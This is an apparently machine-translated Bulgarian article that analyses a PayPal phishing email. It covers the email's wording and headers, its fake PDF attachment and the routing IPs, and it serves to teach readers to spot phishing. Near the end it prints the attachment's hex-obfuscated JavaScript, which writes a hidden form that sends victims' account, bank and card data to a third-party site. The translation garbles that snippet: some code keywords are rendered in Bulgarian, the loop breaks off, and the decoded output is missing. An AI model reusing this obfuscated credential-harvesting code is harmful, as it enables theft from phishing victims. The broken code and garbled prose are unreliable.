Начална » как да » Онлайн сигурност разбива анатомията на фишинг имейл

    Онлайн сигурност разбива анатомията на фишинг имейл


    В днешния свят, където информацията на всеки е онлайн, фишингът е една от най-популярните и опустошителни онлайн атаки, защото винаги можете да почистите вируса, но ако банковите ви данни бъдат откраднати, сте в беда. Ето една разбивка на една такава атака, която получихме.

    Не мислете, че вашите банкови данни са важни: в края на краищата, ако някой получи контрол върху данните за вход в профила ви, те не само знаят информацията, съдържаща се в този профил, но вероятността същата информация за вход да се използва за различни сметки. Ако компрометират имейл профила ви, те могат да възстановят всички други пароли.

    Така че освен да запазвате силни и променящи се пароли, трябва винаги да сте нащрек за фалшиви имейли, маскирани като истинско нещо. Докато повечето опити за фишинг са аматьорски, някои са доста убедителни, така че е важно да се разбере как да ги разпознаем на повърхностно ниво, както и как работят под капака..

    Изображение от asirap

    Разглеждане на това, което е в обикновена гледка

    Нашият пример за електронна поща, както и повечето опити за фишинг, ви уведомява за активността в профила Ви в PayPal, който при нормални обстоятелства е тревожен. Така че призивът за действие е да потвърдите / възстановите профила си, като изпратите почти всяка лична информация, за която можете да се сетите. Отново, това е доста формулично.

    Макар че със сигурност има изключения, почти всяка фишинг и измама се зареждат с червени знамена директно в съобщението. Дори ако текстът е убедителен, обикновено можете да откриете много грешки, които се съдържат в тялото на съобщението, което показва, че съобщението не е законно.

    Тялото на съобщението

    На пръв поглед това е едно от най-добрите фишинг имейли, които съм виждал. Няма грешки или правописни грешки, а красноречието се чете според очакванията ви. Въпреки това, има няколко червени флага, които можете да видите, когато разглеждате съдържанието малко по-отблизо.

    • “Paypal” - Правилният случай е “PayPal” (капитал P). Можете да видите и двете варианти да се използват в съобщението. Компаниите са много обмислени с брандирането си, така че е съмнително нещо подобно да премине процеса на проверка.
    • „Разрешаване на ActiveX“ - Колко пъти сте виждали легален уеб базиран бизнес с размера на Paypal да използвате патентован компонент, който работи само на един браузър, особено когато те поддържат множество браузъри? Разбира се, някъде там го прави някаква компания, но това е червен флаг.
    • „Забележете как тази дума не се подрежда в полето с останалата част от текста на абзаца. Дори и да разтягам прозореца малко повече, той не се увива правилно.
    • "Paypal!" - Пространството преди удивителния знак изглежда неудобно. Просто още една приумица, която съм сигурен, че няма да е в легален имейл.
    • "PayPal-акаунт Update Form.pdf.htm" - Защо Paypal прикачите "PDF", особено когато те могат просто да се свържете към страница на техния сайт? Освен това, защо те се опитват да прикрият HTML файл като PDF? Това е най-големият червен флаг на всички тях.

    Заглавната част на съобщението

    Когато погледнете заглавката на съобщението, се появяват още няколко червени знамена:

    • От адресът е [email protected].
    • Липсва адресът за адрес. Не бях го изчистил, просто не е част от стандартното заглавие на съобщението. Обикновено компания, която има вашето име, ще ви персонализира имейла.

    Приложението

    Когато отворя прикачения файл, можете веднага да видите, че оформлението не е правилно, тъй като липсва информация за стила. Отново, защо PayPal изпраща по електронна поща HTML форма, когато те просто могат да ви дадат линк на техния сайт?

    Забележка: за тази цел използвахме вградения в Gmail преглед на HTML прикачените файлове, но препоръчваме да не отваряте прикачени файлове от измамници. Никога. Някога. Те много често съдържат подвизи, които ще инсталират троянски коне на вашия компютър, за да откраднат информацията за вашия акаунт.

    Ако прегледате малко повече, можете да видите, че тази форма изисква не само информация за вход в PayPal, но и за банкова информация и информация за кредитни карти. Някои от изображенията са счупени.

    Очевидно този опит за фишинг върви след всичко с един удар.

    Техническата разбивка

    Макар че трябва да е доста ясно, на базата на това, което е очевидно, че това е опит за фишинг, сега ще разбием техническия състав на имейла и ще видим какво можем да намерим.

    Информация от Приложението

    Първото нещо, което трябва да разгледаме, е HTML източникът на формата на прикачения файл, който предоставя данните на фалшивия сайт.

    Когато бързо преглеждате източника, всички връзки изглеждат валидни, тъй като сочат към „paypal.com“ или „paypalobjects.com“, които са легитимни..

    Сега ще разгледаме някои основни данни, които Firefox събира на страницата.

    Както можете да видите, някои от графиките са изтеглени от домейните “blessedtobe.com”, “goodhealthpharmacy.com” и “pic-upload.de” вместо легитимните PayPal домейни..

    Информация от заглавките на имейлите

    След това ще разгледаме суровите заглавия на имейл съобщенията. Gmail го прави достъпно чрез опцията Показване на оригиналното меню в съобщението.

    Разглеждайки заглавната информация за оригиналното съобщение, можете да видите, че съобщението е съставено с помощта на Outlook Express 6. Съмнявам се, че PayPal има някой от персонала, който изпраща всяко от тези съобщения ръчно чрез остарял имейл клиент..

    Сега, като разгледаме информацията за маршрутизация, можем да видим IP адреса на изпращача и пощенския сървър.

    IP адресът „Потребител“ е оригинален подател. Правейки бърз преглед на информацията за IP, можем да видим изпращането на IP е в Германия.

    И когато погледнем на пощенския сървър на препредаването (mail.itak.at), IP адресът, който можем да видим, е интернет доставчик, базиран в Австрия. Съмнявам се, PayPal маршрути техните имейли директно чрез Австрия базирани ISP, когато те имат масивна сървър ферма, която може лесно да се справи с тази задача.

    Къде отиват данните??

    Така че ясно определихме, че това е имейл за фишинг и събрахме информация за това откъде произхожда съобщението, но какво е мястото, където са изпратени данните ви?

    За да видим това, трябва първо да запазим прикачения файл на HTM и да се отвори в текстов редактор. Скролирайки го, всичко изглежда в ред, освен когато стигнем до подозрително изглеждащ Javascript блок.

    Разчупвайки пълния източник на последния блок на Javascript, виждаме:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    Var I, Y, X = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; у = "за (I = 0; и

    Всеки път, когато видите голям шум от привидно случайни букви и цифри, вградени в Javascript блок, той обикновено е нещо подозрително. Гледайки кода, променливата “x” е настроена на този голям низ и се декодира в променливата “y”. Крайният резултат от променливата “y” се записва в документа като HTML.

    Тъй като големият низ е съставен от числа 0-9 и буквите a-f, най-вероятно той е кодиран чрез проста конверсия ASCII към Hex:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    Превежда на:

    Не е случайно, че това се декодира във валиден етикет на HTML формуляр, който изпраща резултатите не до PayPal, а до нечестния сайт.

    Освен това, когато преглеждате HTML източника на формуляра, ще видите, че този маркер за формуляр не се вижда, защото се генерира динамично чрез Javascript. Това е умен начин да скриете какво действително прави HTML, ако някой просто прегледа генерирания източник на прикачен файл (както го направихме по-рано), за разлика от отварянето на прикачения файл директно в текстов редактор.

    Работейки бързо на сайта на нарушителя, можем да видим, че това е домейн, хостван на популярен уеб хост, 1and1.

    Това, което се откроява е, че домейнът използва четливо име (за разлика от нещо като “dfh3sjhskjhw.net”) и домейнът е регистриран в продължение на 4 години. Поради това считам, че този домейн е бил откраднат и използван като пешка в този опит за фишинг.

    Цинизмът е добра защита

    Когато става въпрос да останем в безопасност онлайн, никога не ви вреди да имате малко цинизъм.

    Макар да съм сигурен, че има повече червени флагчета в примера за електронната поща, това, което посочихме по-горе, са показатели, които видяхме след само няколко минути преглед. Хипотетично, ако повърхностното ниво на имейла имитира легитимния му дял от 100%, техническият анализ все пак ще разкрие истинската му същност. Ето защо е важно да бъде в състояние да изследва както това, което можеш и не можеш да видиш.